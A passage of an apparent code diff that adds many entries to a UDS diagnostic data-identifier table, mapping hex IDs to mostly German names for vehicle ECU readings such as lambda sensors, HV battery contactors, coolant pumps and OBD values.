+UDS_RDBI.dataIdentifiers[0xb521] = "Tankdichtigkeitsdiagnose 1 mm" +UDS_RDBI.dataIdentifiers[0xb522] = "Tankdichtigkeitsdiagnose Grobleck" +UDS_RDBI.dataIdentifiers[0xb523] = "Tankdichtigkeitsdiagnose Grobleck" +UDS_RDBI.dataIdentifiers[0xb524] = "Tankentlueftungsprinzipdiagnose" +UDS_RDBI.dataIdentifiers[0xb525] = "Tankentlueftungsprinzipdiagnose" +UDS_RDBI.dataIdentifiers[0xb526] = "Sonde hinter Kat rechts" +UDS_RDBI.dataIdentifiers[0xb527] = "Sonde hinter Kat rechts" +UDS_RDBI.dataIdentifiers[0xb528] = "Sonde hinterKat links" +UDS_RDBI.dataIdentifiers[0xb529] = "Sonde hinterKat links" +UDS_RDBI.dataIdentifiers[0xb530] = "Sondenheizung vor Kat rechts" +UDS_RDBI.dataIdentifiers[0xb531] = "Sondenheizung vor Kat rechts" +UDS_RDBI.dataIdentifiers[0xb532] = "Sondenheizung vor Kat links" +UDS_RDBI.dataIdentifiers[0xb533] = "Sondenheizung vor Kat links" +UDS_RDBI.dataIdentifiers[0xb534] = "Sondenheizung hinterKat rechts" +UDS_RDBI.dataIdentifiers[0xb535] = "Sondenheizung hinterKat rechts" +UDS_RDBI.dataIdentifiers[0xb536] = "Sondenheizung hinter Kat links" +UDS_RDBI.dataIdentifiers[0xb537] = "Sondenheizung hinter Kat links" +UDS_RDBI.dataIdentifiers[0xb538] = "Kurbelgehaeuse Entlueftung" +UDS_RDBI.dataIdentifiers[0xb539] = "Kurbelgehaeuse Entlueftung" +UDS_RDBI.dataIdentifiers[0xb540] = "Motortemperatursensor haengt kalt" +UDS_RDBI.dataIdentifiers[0xb541] = "Motortemperatursensor haengt kalt" +UDS_RDBI.dataIdentifiers[0xb542] = "Motortemperatursensor haengt warm" +UDS_RDBI.dataIdentifiers[0xb543] = "Motortemperatursensor haengt warm" +UDS_RDBI.dataIdentifiers[0xb544] = "Temperatursensor PremAir" +UDS_RDBI.dataIdentifiers[0xb545] = "Temperatursensor PremAir" +UDS_RDBI.dataIdentifiers[0xb546] = "Ansauglufttemperatursensor" +UDS_RDBI.dataIdentifiers[0xb547] = "Ansauglufttemperatursensor" +UDS_RDBI.dataIdentifiers[0xb548] = "Umgebungslufttemperatursensor" +UDS_RDBI.dataIdentifiers[0xb549] = "Umgebungslufttemperatursensor" +UDS_RDBI.dataIdentifiers[0xb550] = "Umgebungsluftdrucksensor" +UDS_RDBI.dataIdentifiers[0xb551] = "Umgebungsluftdrucksensor" +UDS_RDBI.dataIdentifiers[0xb552] = "Saugrohrdrucksensor" +UDS_RDBI.dataIdentifiers[0xb553] = "Saugrohrdrucksensor" +UDS_RDBI.dataIdentifiers[0xb554] = "Ladedrucksensor" +UDS_RDBI.dataIdentifiers[0xb555] = "NennerLadedrucksensor" +UDS_RDBI.dataIdentifiers[0xb556] = "Heissfilmluftmassensensor" +UDS_RDBI.dataIdentifiers[0xb557] = "Heissfilmluftmassensensor" +UDS_RDBI.dataIdentifiers[0xb558] = "Tankdrucksensor" +UDS_RDBI.dataIdentifiers[0xb559] = "Tankdrucksensor" +UDS_RDBI.dataIdentifiers[0xb560] = "Aktivkohleabsperrventil" +UDS_RDBI.dataIdentifiers[0xb561] = "Aktivkohleabsperrventil" +UDS_RDBI.dataIdentifiers[0xb562] = "Drosselklappe Lage Pruefung" +UDS_RDBI.dataIdentifiers[0xb563] = "Drosselklappe Lage Pruefung" +UDS_RDBI.dataIdentifiers[0xb564] = "Drosselklappe Bereich Pruefung" +UDS_RDBI.dataIdentifiers[0xb565] = "Drosselklappe Bereich Pruefung" +UDS_RDBI.dataIdentifiers[0xb566] = "Versatz NoWe Auslass rechts" +UDS_RDBI.dataIdentifiers[0xb567] = "Versatz NoWe Auslass rechts" +UDS_RDBI.dataIdentifiers[0xb568] = "Versatz NoWe Auslass links" +UDS_RDBI.dataIdentifiers[0xb569] = "Versatz NoWe Auslass links" +UDS_RDBI.dataIdentifiers[0xb570] = "Versatz NoWe Einlass rechts" +UDS_RDBI.dataIdentifiers[0xb571] = "Versatz NoWe Einlass rechts" +UDS_RDBI.dataIdentifiers[0xb572] = "Versatz NoWe Einlass links" +UDS_RDBI.dataIdentifiers[0xb573] = "Versatz NoWe Einlass links" +UDS_RDBI.dataIdentifiers[0xb574] = "Fahrzeuggeschwindigkeit" +UDS_RDBI.dataIdentifiers[0xb575] = "Fahrzeuggeschwindigkeit" +UDS_RDBI.dataIdentifiers[0xb576] = "Leerlaufregelung" +UDS_RDBI.dataIdentifiers[0xb577] = "Leerlaufregelung" +UDS_RDBI.dataIdentifiers[0xb578] = "Sonde hinterKat Schwingungspruefung rechts" +UDS_RDBI.dataIdentifiers[0xb579] = "Sonde hinterKat Schwingungspruefung rechts" +UDS_RDBI.dataIdentifiers[0xb580] = "Sonde hinterKat Schwingungspruefung links" +UDS_RDBI.dataIdentifiers[0xb581] = "Sonde hinterKat Schwingungspruefung links" +UDS_RDBI.dataIdentifiers[0xc000] = "fuer Warmstartleitung" # or Korrekturwert Anfettung Start +UDS_RDBI.dataIdentifiers[0xc001] = "Sensor High Range" # or Reset Zaehler Warmstartleitung +UDS_RDBI.dataIdentifiers[0xc002] = "Sensor Medium Range" +UDS_RDBI.dataIdentifiers[0xc003] = "Sensor Low Range" +UDS_RDBI.dataIdentifiers[0xc004] = "Max Block Resistance" +UDS_RDBI.dataIdentifiers[0xc005] = "Contactor Closure Inhibit" +UDS_RDBI.dataIdentifiers[0xc006] = "Pack Voltage" +UDS_RDBI.dataIdentifiers[0xc007] = "Pack Voltage (Source)" +UDS_RDBI.dataIdentifiers[0xc008] = "BUS voltage" +UDS_RDBI.dataIdentifiers[0xc009] = "BUS voltage (Source)" +UDS_RDBI.dataIdentifiers[0xc00a] = "Abgleich Energmanag Trip Computer perHour" +UDS_RDBI.dataIdentifiers[0xc00b] = "Abgleich Energmanag Crash Reset" +UDS_RDBI.dataIdentifiers[0xc010] = "Precharge Fail Penalty Time" +UDS_RDBI.dataIdentifiers[0xc011] = "Korrekturwert Hybrid Ladezustand Modus Quick Charge" +UDS_RDBI.dataIdentifiers[0xc012] = "HV Contactor Command" +UDS_RDBI.dataIdentifiers[0xc013] = "Produktionsmodus Interlock Freigabe" # or HV Isolation Fault Diagnostic Stat +UDS_RDBI.dataIdentifiers[0xc014] = "Present Reasons Contactors Opened " +UDS_RDBI.dataIdentifiers[0xc015] = "Contactor 12 volt feed" +UDS_RDBI.dataIdentifiers[0xc016] = "Pump 12 volt feed" +UDS_RDBI.dataIdentifiers[0xc017] = "Produktionsmodus E Maschine neutral Freigabe" # or HV Isolation Fault Diagnostic Stat +UDS_RDBI.dataIdentifiers[0xc018] = "Service Disconnect" +UDS_RDBI.dataIdentifiers[0xc019] = "HVIL" +UDS_RDBI.dataIdentifiers[0xc020] = "connector inputs 12v" +UDS_RDBI.dataIdentifiers[0xc021] = "Kuehlaggregat Chillerventil CO2 Befuellmodus" +UDS_RDBI.dataIdentifiers[0xc022] = "Abgasklappe obere Regelbereichsgrenze" +UDS_RDBI.dataIdentifiers[0xc023] = "Abgasklappe untere Regelbereichsgrenze" +UDS_RDBI.dataIdentifiers[0xc100] = "Laufzeit mit Motorlauf" +UDS_RDBI.dataIdentifiers[0xc101] = "Fahrt" +UDS_RDBI.dataIdentifiers[0xc102] = "Leerlauf" +UDS_RDBI.dataIdentifiers[0xc103] = "Laufzeit ohne Motorlauf" +UDS_RDBI.dataIdentifiers[0xc104] = "Startvorgaenge" +UDS_RDBI.dataIdentifiers[0xc105] = "Qualitaetsfaktor" +UDS_RDBI.dataIdentifiers[0xc106] = "Oelreset Anzahl" +UDS_RDBI.dataIdentifiers[0xc107] = "Nachfuellungen Anzahl" +UDS_RDBI.dataIdentifiers[0xc108] = "Fahrzeuguebergabe durchgefuehrt" +UDS_RDBI.dataIdentifiers[0xc109] = "Fahrzeuguebergabe Offset Strecke" +UDS_RDBI.dataIdentifiers[0xc110] = "Tag letzter Motoraus" +UDS_RDBI.dataIdentifiers[0xc111] = "Tag letzter Motorlauf" +UDS_RDBI.dataIdentifiers[0xc112] = "Oelverduennung" +UDS_RDBI.dataIdentifiers[0xc120] = "" +UDS_RDBI.dataIdentifiers[0xc121] = "Restlaufstrecke Anzeige" +UDS_RDBI.dataIdentifiers[0xc122] = "Restlaufzeit" +UDS_RDBI.dataIdentifiers[0xc123] = "Laufzeit mit Motor" +UDS_RDBI.dataIdentifiers[0xc124] = "Fahrt" +UDS_RDBI.dataIdentifiers[0xc125] = "Leerlauf" +UDS_RDBI.dataIdentifiers[0xc126] = "Startvorgaenge" +UDS_RDBI.dataIdentifiers[0xc127] = "Qualitaetsfaktor" +UDS_RDBI.dataIdentifiers[0xc128] = "gesamt" +UDS_RDBI.dataIdentifiers[0xc129] = "korr" +UDS_RDBI.dataIdentifiers[0xc130] = "Kilometerklasse" +UDS_RDBI.dataIdentifiers[0xc131] = "" +UDS_RDBI.dataIdentifiers[0xc132] = "Service Datum" +UDS_RDBI.dataIdentifiers[0xc133] = "Oelverduennung" +UDS_RDBI.dataIdentifiers[0xc134] = "vor Wartung" +UDS_RDBI.dataIdentifiers[0xc135] = "Datenuebergabe" +UDS_RDBI.dataIdentifiers[0xc136] = "Datenuebergabe zuletzt bestaetigt" +UDS_RDBI.dataIdentifiers[0xc137] = "Datenuebergabe Backup zuletzt bestaetigt" +UDS_RDBI.dataIdentifiers[0xc140] = "Ladestrom Tarifumschaltung MobisFr Zeitvektor" +UDS_RDBI.dataIdentifiers[0xc141] = "Ladestrom Tarifumschaltung MobisFr Kostenvektor" +UDS_RDBI.dataIdentifiers[0xc142] = "Ladestrom Tarifumschaltung MobisFr Leistungsbegrenzungsvektor" +UDS_RDBI.dataIdentifiers[0xc143] = "Ladestrom Tarifumschaltung SamstagSonntag Zeitvektor" +UDS_RDBI.dataIdentifiers[0xc144] = "Ladestrom Tarifumschaltung SamstagSonntag Kostenvektor" +UDS_RDBI.dataIdentifiers[0xc145] = "Ladestrom Tarifumschaltung SamstagSonntag Leistungsbegrenzungsvektor" +UDS_RDBI.dataIdentifiers[0xc146] = "Ladestrom Tarifumschaltung Aktivierungsstatus" +UDS_RDBI.dataIdentifiers[0xc147] = "Ladestrom Tarifumschaltung OrtsbasierterStromtarif" +UDS_RDBI.dataIdentifiers[0xc148] = "Kraftstoffverbrauch Lebenszeit Gesamtkilometerstand Nackommastellen" +UDS_RDBI.dataIdentifiers[0xc149] = "Kraftstoffverbrauch Lebenszeit Gesamtkilometerstand" +UDS_RDBI.dataIdentifiers[0xc150] = "Kraftstoffvolumen Lebenszeit Nachkommastellen" +UDS_RDBI.dataIdentifiers[0xc151] = "Kraftstoffvolumen Lebenszeit" +UDS_RDBI.dataIdentifiers[0xc27a] = "Fahrzeuguebergabe durchgefuehrt ASSYST Fahrzeuguebergabe durchgefuehrt" +UDS_RDBI.dataIdentifiers[0xc406] = "Ladestrom Tarifumschaltung MobisFr Zeitvektor" +UDS_RDBI.dataIdentifiers[0xc407] = "Ladestrom Tarifumschaltung MobisFr Kostenvektor" +UDS_RDBI.dataIdentifiers[0xc408] = "Ladestrom Tarifumschaltung MobisFr Leistungsbegrenzungsvektor" +UDS_RDBI.dataIdentifiers[0xc409] = "Ladestrom Tarifumschaltung SamstagSonntag Zeitvektor" +UDS_RDBI.dataIdentifiers[0xc40a] = "Ladestrom Tarifumschaltung SamstagSonntag Kostenvektor" +UDS_RDBI.dataIdentifiers[0xc40b] = "Ladestrom Tarifumschaltung SamstagSonntag Leistungsbegrenzungsvektor" +UDS_RDBI.dataIdentifiers[0xc40c] = "Ladestrom Tarifumschaltung Aktivierungsstatus" +UDS_RDBI.dataIdentifiers[0xc800] = "EgfPosn agIdle" # or TAC LrndIdlePosn +UDS_RDBI.dataIdentifiers[0xc801] = "TAC BreakAway Actv Cntr" # or EgfBreakAwy ctrAcv +UDS_RDBI.dataIdentifiers[0xc802] = "TAC Clng DrvCycCntr" # or EgfClng ctrDrvCyc +UDS_RDBI.dataIdentifiers[0xc803] = "throttle actuator control learned lower position" +UDS_RDBI.dataIdentifiers[0xc804] = "TAC LrndUpPosn" +UDS_RDBI.dataIdentifiers[0xc805] = "EgfPosnLrn ctrDrvCyc" # or throttle actuator control position learning driving cycle counter +UDS_RDBI.dataIdentifiers[0xc806] = "EgrfPosn agIdle" # or angle EGR flap idle +UDS_RDBI.dataIdentifiers[0xc807] = "EgrfPosnCtl agRngLo" # or angle EGR flap lower block +UDS_RDBI.dataIdentifiers[0xc808] = "angle EGR flap upper block" # or EgrfPosnCtl agRngHi +UDS_RDBI.dataIdentifiers[0xc809] = "ctr EgrFBreakAwyAcv" # or ctr EgrFlapBreakAwyAcv +UDS_RDBI.dataIdentifiers[0xc80a] = "ctr EgrFPosnLrnDrvCyc" # or ctr EgrFlapPosnLrnDrvCyc +UDS_RDBI.dataIdentifiers[0xc80b] = "ctr EgrFClngDrvCyc" # or ctr EgrFlapClngDrvCyc +UDS_RDBI.dataIdentifiers[0xc80c] = "LEGR PDiff Adap Offs" +UDS_RDBI.dataIdentifiers[0xcf00] = "EOL Enable Disable sensors" +UDS_RDBI.dataIdentifiers[0xcf01] = "Internal Software Version Information" +UDS_RDBI.dataIdentifiers[0xcf02] = "EOL BLDC Driver Status" +UDS_RDBI.dataIdentifiers[0xcf03] = "Pressure sensor output Read Response Parameters Pressure sensor output" +UDS_RDBI.dataIdentifiers[0xcf04] = "EOL FLS and FPS status" +UDS_RDBI.dataIdentifiers[0xcf10] = "EOL Identification" +UDS_RDBI.dataIdentifiers[0xcf50] = "Write SBC Register" +UDS_RDBI.dataIdentifiers[0xd000] = "Anfettung Start Nachstart" +UDS_RDBI.dataIdentifiers[0xd001] = "Klemmenschaltung Read IO Control" # or Klemmenschaltung, SH F LED1 1 Read IO Control +UDS_RDBI.dataIdentifiers[0xd002] = "SH F LED2 Read IO Control" # or Zentralverriegelung Read IO Control +UDS_RDBI.dataIdentifiers[0xd003] = "DSM Notpfad" # or Regelschwelle Lambda nach KAT (DE, SH F OUT Read IO Control, DSM Notpfad Read IO Control, Lambda Regelschwelle nach Kat +UDS_RDBI.dataIdentifiers[0xd004] = "Lastschlagdaempfung Korrektur" # or Steering Wheel Angle +UDS_RDBI.dataIdentifiers[0xd005] = "Laufruhe Empfindlichkeit Korrektur" # or Empfindlichkeit der Laufruhebewertung +UDS_RDBI.dataIdentifiers[0xd006] = "Batterietrennschalter Read IO Control" +UDS_RDBI.dataIdentifiers[0xd007] = "Ignition Switch" # or Suchbeleuchtung Taster Read IO Control, Leerlaufsolldrehzahl Mit Fahrstufe +UDS_RDBI.dataIdentifiers[0xd008] = "Entfall Sicherungsstifte" # or Leistungsgewicht Korrektur, Korrekturfaktor Leistungsgewicht, Entfall Sicherungsstifte Read IO Control +UDS_RDBI.dataIdentifiers[0xd009] = "MKV Korrektur" +UDS_RDBI.dataIdentifiers[0xd010] = "Fahrertuerkontakplausibilitaet" # or ROZ Korrektur +UDS_RDBI.dataIdentifiers[0xd011] = "SH BF LED1 Read IO Control" +UDS_RDBI.dataIdentifiers[0xd012] = "SH BF LED2 Read IO Control" +UDS_RDBI.dataIdentifiers[0xd013] = "SH BF OUT Read IO Control" +UDS_RDBI.dataIdentifiers[0xd014] = "Haptisches Fahrpedalmodul" +UDS_RDBI.dataIdentifiers[0xd015] = "Kuehlmittelpumpe HVBatteriekuehlung" +UDS_RDBI.dataIdentifiers[0xd016] = "Kuehlmittel Drehschieberventil BMS" +UDS_RDBI.dataIdentifiers[0xd017] = "Hochvolt Auslenkung Ladezustand" +UDS_RDBI.dataIdentifiers[0xd018] = "Anforderung Stromloser Zustand" +UDS_RDBI.dataIdentifiers[0xd019] = "SAM Bordnetzumschaltung" +UDS_RDBI.dataIdentifiers[0xd020] = "SH DPLUS Read IO Control" +UDS_RDBI.dataIdentifiers[0xd021] = "Check Engine Lamp" # or Check Engine, Systemwarnlampe +UDS_RDBI.dataIdentifiers[0xd022] = "Entladestrompuls El Kaeltemittelverdichter" # or Drehschieber des Waermemanagements +UDS_RDBI.dataIdentifiers[0xd023] = "SOC Vorgabe" # or Drosselklappenwinkel +UDS_RDBI.dataIdentifiers[0xd024] = "Einspritzventil HWZyl1" # or Ausblendmuster Einspritzventile +UDS_RDBI.dataIdentifiers[0xd025] = "Kuehlaggregat Chillerventil CO2" # or Gemischanpassung +UDS_RDBI.dataIdentifiers[0xd026] = "Abgasklappe Otto rechts Read IO Control" # or Abgasklappe Otto rechts, Erregerstrombegrenzung +UDS_RDBI.dataIdentifiers[0xd027] = "Regelspannung" +UDS_RDBI.dataIdentifiers[0xd028] = "Abgasklappe Otto links" # or Rampenzeit +UDS_RDBI.dataIdentifiers[0xd029] = "Drehzahlschwelle" +UDS_RDBI.dataIdentifiers[0xd030] = "Heizabsperrventil" +UDS_RDBI.dataIdentifiers[0xd031] = "Kuehlerjalousie Fahrsoftware" # or Kuehlerjalousie Testervorgabe, Kuehlerjalousie LIN Read Kuehlerjalousie +UDS_RDBI.dataIdentifiers[0xd032] = "Kuehlmittelpumpe Getriebeoelkuehlung" # or Lambdaregelung +UDS_RDBI.dataIdentifiers[0xd033] = "Kuehlmittelpumpe LIN Read Kuehlmittelpumpe" +UDS_RDBI.dataIdentifiers[0xd034] = "Heizkreislauf HV Batterie Absperrventil" +UDS_RDBI.dataIdentifiers[0xd035] = "Nachlaufverlaengerung FBS" +UDS_RDBI.dataIdentifiers[0xd036] = "Nockenwellensteller Auslass" +UDS_RDBI.dataIdentifiers[0xd037] = "Anforderung Schubbetrieb" +UDS_RDBI.dataIdentifiers[0xd038] = "Kuehlmittelpumpe Bypass" +UDS_RDBI.dataIdentifiers[0xd039] = "X1 HotLoop Pump" # or Luefter LIN Read Luefter +UDS_RDBI.dataIdentifiers[0xd03a] = "Luefter PWM" +UDS_RDBI.dataIdentifiers[0xd040] = "X1 ColdLoop Pump" # or Kuehlmittel Drehschieberventil LIN Read Kuehlmittel Drehschieberventil +UDS_RDBI.dataIdentifiers[0xd041] = "X1 HVLoop Pump" # or Sondenheizung normierte Leistung Nach KAT +UDS_RDBI.dataIdentifiers[0xd042] = "X1 BatLoop Pump" # or Kuehlmittel Drehschieberventil 2 +UDS_RDBI.dataIdentifiers[0xd043] = "Fahrstufe Vorgabe" # or X1 HotLoop Valve1, Sondenheizung Vor KAT +UDS_RDBI.dataIdentifiers[0xd044] = "X1 HotLoop Valve2" +UDS_RDBI.dataIdentifiers[0xd045] = "X1 HotLoop BatHeaterValve" # or Saugrohrumschaltung +UDS_RDBI.dataIdentifiers[0xd046] = "X1 HotLoop BypassValve" +UDS_RDBI.dataIdentifiers[0xd047] = "X1 ColdLoop BypassValve" +UDS_RDBI.dataIdentifiers[0xd048] = "Tumbleklappe" # or X1 BatLoop Valve +UDS_RDBI.dataIdentifiers[0xd049] = "X1 FrontFan" # or Zuendwinkelverstellung +UDS_RDBI.dataIdentifiers[0xd050] = "X1 EngOilFan PWM" +UDS_RDBI.dataIdentifiers[0xd051] = "X1 EngBayFan PWM" # or Einspritzzeit Rechts Array +UDS_RDBI.dataIdentifiers[0xd052] = "X1 HVSideFan PWM" +UDS_RDBI.dataIdentifiers[0xd055] = "NT Absperrventil" +UDS_RDBI.dataIdentifiers[0xd061] = "Anhebung der Leerlaufdrehzahl" +UDS_RDBI.dataIdentifiers[0xd062] = "Wastegate Read Wastegate" +UDS_RDBI.dataIdentifiers[0xd068] = "Schubumluftventil" +UDS_RDBI.dataIdentifiers[0xd06f] = "Ladeluftkuehlmittelpumpe kontinuierlich" +UDS_RDBI.dataIdentifiers[0xd073] = "Motoroelpumpe Ventil" # or Ventil Motoroelpumpe +UDS_RDBI.dataIdentifiers[0xd082] = "Momentenvorgabe Verbr. motor Hybrid" +UDS_RDBI.dataIdentifiers[0xd084] = "DMTL Tanksystem - Pumpe" +UDS_RDBI.dataIdentifiers[0xd085] = "DMTL Tanksystem - Ventil" +UDS_RDBI.dataIdentifiers[0xd086] = "DMTL Tanksystem - Heizung" +UDS_RDBI.dataIdentifiers[0xd088] = "Energmanag Hochvolt Auslenkung Ladezustand" +UDS_RDBI.dataIdentifiers[0xd089] = "Entladestrompuls Elektromaschine" +UDS_RDBI.dataIdentifiers[0xd090] = "Entladestrompuls DCDC Umsetzer" +UDS_RDBI.dataIdentifiers[0xd092] = "Energmanag Anforderung Stromloser Zustand" # or Anforderung an Energiemanagement - stromloser Zustand +UDS_RDBI.dataIdentifiers[0xd093] = "Regenerierventil LPV" +UDS_RDBI.dataIdentifiers[0xd100] = "DDPRelayControl" # or Feste Widerstandsvorgabe Hebelgeber primaer sekundaer +UDS_RDBI.dataIdentifiers[0xd101] = "FixedVoltageMode" +UDS_RDBI.dataIdentifiers[0xd102] = "DDPStartFunction" # or Klemme87 Read Klemme87 +UDS_RDBI.dataIdentifiers[0xd103] = "Stop Start Relay" +UDS_RDBI.dataIdentifiers[0xd123] = "Bremskreis Unterdruckpumpe" +UDS_RDBI.dataIdentifiers[0xd124] = "Luefter Heck" +UDS_RDBI.dataIdentifiers[0xd125] = "Klimakompressor" +UDS_RDBI.dataIdentifiers[0xd126] = "Kuehlkreislauf Absperrventil" +UDS_RDBI.dataIdentifiers[0xd201] = "Kuehlmittelpumpe NT2 15W BMS" +UDS_RDBI.dataIdentifiers[0xd202] = "Kuehlaggregat Umschaltventil" +UDS_RDBI.dataIdentifiers[0xd204] = "Kuehlmittelpumpe Plugin Hybrid Read Kuehlmittelpumpe Plugin Hybrid" +UDS_RDBI.dataIdentifiers[0xd205] = "Kuehlaggregat Expansionsventil" +UDS_RDBI.dataIdentifiers[0xd206] = "Kuehlmittel Drehschieberventil BMS" +UDS_RDBI.dataIdentifiers[0xd208] = "Kuehlermaskenjalousie" +UDS_RDBI.dataIdentifiers[0xd209] = "Kuehlmittelpumpe AMG LIN PRES LIN CP CAC2TransActlSpd" +UDS_RDBI.dataIdentifiers[0xd20a] = "PTC Zuheizer Plugin Hybrid" +UDS_RDBI.dataIdentifiers[0xd211] = "verbaute Steuergeraete Ist Chassis1 Lesen" # or verbaute Steuergeraete Ist Chassis1 CGW +UDS_RDBI.dataIdentifiers[0xd212] = "verbaute Steuergeraete Ist Chassis2 CGW" # or verbaute Steuergeraete Ist Chassis2 Lesen +UDS_RDBI.dataIdentifiers[0xd213] = "verbaute Steuergeraete Ist Diagnostic Lesen" # or verbaute Steuergeraete Ist Diagnostic CGW +UDS_RDBI.dataIdentifiers[0xd800] = "EGFP SetVal Diag EGFP SetVal Diag" # or EgfPosn perc +UDS_RDBI.dataIdentifiers[0xd801] = "EgrfPosn perc" # or perc EgrfAgTrnsp +UDS_RDBI.dataIdentifiers[0xd802] = "ICF SetVal" +UDS_RDBI.dataIdentifiers[0xd900] = "VTA HW Ausgaenge" +UDS_RDBI.dataIdentifiers[0xdb06] = "IOC Kraftstoffpumpe Control PWM Vorgabe ohne Schwellen" +UDS_RDBI.dataIdentifiers[0xdb10] = "IOC Kraftstoffpumpe Control Druckvorgabe ohne Schwellen" +UDS_RDBI.dataIdentifiers[0xdb14] = "IOC Kraftstoffpumpe Control Volumenvorgabe ohne Schwellen" +UDS_RDBI.dataIdentifiers[0xdb18] = "IOC Kraftstoffpumpe Control Drehzahlvorgabe ohne Schwellen" +UDS_RDBI.dataIdentifiers[0xdb22] = "IOC Kraftstoffpumpe Control Spannungsvorgabe ohne Schwellen" +UDS_RDBI.dataIdentifiers[0xdb26] = "IOC Kraftstoffdrucksensor Messoffset" +UDS_RDBI.dataIdentifiers[0xdb30] = "IOC Kraftstoffpumpe Control Phasenstrom Vorgabe ohne Schwellen" +UDS_RDBI.dataIdentifiers[0xdf00] = "EOL BLDC Driver Config" +UDS_RDBI.dataIdentifiers[0xdf06] = "EOL IOC Kraftstoffpumpe Control PWM Vorgabe ohne Schwellen" +UDS_RDBI.dataIdentifiers[0xdf18] = "EOL IOC Kraftstoffpumpe Control Drehzahlvorgabe ohne Schwellen" +UDS_RDBI.dataIdentifiers[0xe010] = "Engine In Use Histogram" +UDS_RDBI.dataIdentifiers[0xef00] = "EF01 EF20" # or Software Module Information Applikation Autosar, Software Module Information CANrmation Applikation Autosar ADC AR MAJOR VERSION, ECU Extract Version, SW Module Identification Application AUTOSAR AUTOSAR Module ID, SW Module Identification Application AUTOSAR +UDS_RDBI.dataIdentifiers[0xef02] = "02 DTC that caused required freeze frame data storage" # or Standard Reprogramming SW Package Information, Standard Software FBL Package Information +UDS_RDBI.dataIdentifiers[0xef03] = "SW Integration package ID Major Version" # or Standard Application SW Package Information, Standard Software Package Information, SW Integration package ID Major Version SIP ID Build Version +UDS_RDBI.dataIdentifiers[0xef04] = "SSA Version Information" # or 02 Calculated LOAD value +UDS_RDBI.dataIdentifiers[0xef05] = "02 Engine coolant temperature" +UDS_RDBI.dataIdentifiers[0xef06] = "Short Term Fuel Trim Bank" +UDS_RDBI.dataIdentifiers[0xef07] = "Long Term Fuel Trim Bank" +UDS_RDBI.dataIdentifiers[0xef0a] = "02 Fuel Pressure Gauge" +UDS_RDBI.dataIdentifiers[0xef0b] = "Intake Manifold Absolute Pressure OBD EF0B" +UDS_RDBI.dataIdentifiers[0xef0c] = "Stored engine speed" +UDS_RDBI.dataIdentifiers[0xef0d] = "02 Vehicle speed sensor" +UDS_RDBI.dataIdentifiers[0xef0e] = "02 Ignition timing advance for cylinder" +UDS_RDBI.dataIdentifiers[0xef0f] = "Stored intake air temperature" +UDS_RDBI.dataIdentifiers[0xef11] = "02 Absolute throttle position" +UDS_RDBI.dataIdentifiers[0xef1e] = "02 Auxiliary Input" +UDS_RDBI.dataIdentifiers[0xef1f] = "02 Time Since Engine Start" +UDS_RDBI.dataIdentifiers[0xef20] = "EF21 EF40" +UDS_RDBI.dataIdentifiers[0xef22] = "02 Fuel Pressure relative to manifold vacuum" +UDS_RDBI.dataIdentifiers[0xef23] = "02 Fuel rail pressure" +UDS_RDBI.dataIdentifiers[0xef2e] = "02 Commanded Evaporative Purge" +UDS_RDBI.dataIdentifiers[0xef2f] = "02 Fuel Level Input" +UDS_RDBI.dataIdentifiers[0xef31] = "02 Distance travelled since diagnostic trouble codes cleared" +UDS_RDBI.dataIdentifiers[0xef32] = "Stored raw tank differential pressure" +UDS_RDBI.dataIdentifiers[0xef33] = "02 Barometric Pressure" +UDS_RDBI.dataIdentifiers[0xef3c] = "02 Catalyst Temperature Bank 1 Sensor" +UDS_RDBI.dataIdentifiers[0xef40] = "EF41 EF60" +UDS_RDBI.dataIdentifiers[0xef42] = "02 Control module voltage" +UDS_RDBI.dataIdentifiers[0xef43] = "02 Absolute Load Value" +UDS_RDBI.dataIdentifiers[0xef44] = "02 Fuel Air Commanded Equivalence Ratio" +UDS_RDBI.dataIdentifiers[0xef45] = "02 Relative Throttle Position" +UDS_RDBI.dataIdentifiers[0xef46] = "02 Ambient air temperature same scaling as IAT 0F" +UDS_RDBI.dataIdentifiers[0xef47] = "02 Absolute Throttle Position B" +UDS_RDBI.dataIdentifiers[0xef48] = "02 Absolute Throttle Position C" +UDS_RDBI.dataIdentifiers[0xef49] = "02 Absolute Throttle Position D" +UDS_RDBI.dataIdentifiers[0xef4a] = "02 Absolute Throttle Position E" +UDS_RDBI.dataIdentifiers[0xef4c] = "02 Commanded Throttle Actuator Control" +UDS_RDBI.dataIdentifiers[0xef82] = "States of the monitoring ECU for CAN network diagnosis" +UDS_RDBI.dataIdentifiers[0xf010] = "Temperature Counter Erase" +UDS_RDBI.dataIdentifiers[0xf011] = "Appl SW Program Data Version" +UDS_RDBI.dataIdentifiers[0xf012] = "VehicleManufacturerECUSoftwareNumber Ref C" +UDS_RDBI.dataIdentifiers[0xf014] = "Network Configuration FlexRay Network" +UDS_RDBI.dataIdentifiers[0xf050] = "RB SW Version information" +UDS_RDBI.dataIdentifiers[0xf0e0] = "FD01 FEFF" +UDS_RDBI.dataIdentifiers[0xf0ff] = "RSA reset componant" +UDS_RDBI.dataIdentifiers[0xf100] = "ECU Identifikation: ECU Origin (DiagVersion)" # or Entriegeln, ActiveDiagnosticInformation Active Diagnostic Session, Active Diagnostic Status of ECU, Aktive Diagnose Information Aktive SG Software, F100 Active Diagnostic Session +UDS_RDBI.dataIdentifiers[0xf103] = "Vedoc Relevant Information Read Hardware Part Number" +UDS_RDBI.dataIdentifiers[0xf104] = "Read Ecu Name" +UDS_RDBI.dataIdentifiers[0xf10a] = "ECU Origin ECU Origin" +UDS_RDBI.dataIdentifiers[0xf10b] = "ECU Identification" +UDS_RDBI.dataIdentifiers[0xf10d] = "UDS Diagnostic Protocol Version MBN 10747" # or Version Diagnoseprotokoll DPRS Major Version, Version Diagnoseprotokoll Diagnostic Performance Requirements Standard, DDS Package Release +UDS_RDBI.dataIdentifiers[0xf10e] = "Prozessortyp Identifikation" # or FlexRay Configuration Information, Prozessortyp +UDS_RDBI.dataIdentifiers[0xf10f] = "OSEK Module Information Communication Layer Patch Level" # or OSEKModuleInformation Communication Layer Patch Level, OSEKModuleInformation, OSEK-Modulinformation, OSEK Modulinformation Betriebssystem Spezifikation +UDS_RDBI.dataIdentifiers[0xf111] = "ECU Identifikation: HW Partnumber" +UDS_RDBI.dataIdentifiers[0xf112] = "Chrysler Group Hardware" +UDS_RDBI.dataIdentifiers[0xf11d] = "HW SW Version Produktion BL SV SW Version Major" +UDS_RDBI.dataIdentifiers[0xf121] = "MercedesCarGroupSoftware" +UDS_RDBI.dataIdentifiers[0xf132] = "ECU Teilenummer" +UDS_RDBI.dataIdentifiers[0xf150] = "HardwareVersion HW" +UDS_RDBI.dataIdentifiers[0xf151] = "SoftwareVersion SW" +UDS_RDBI.dataIdentifiers[0xf152] = 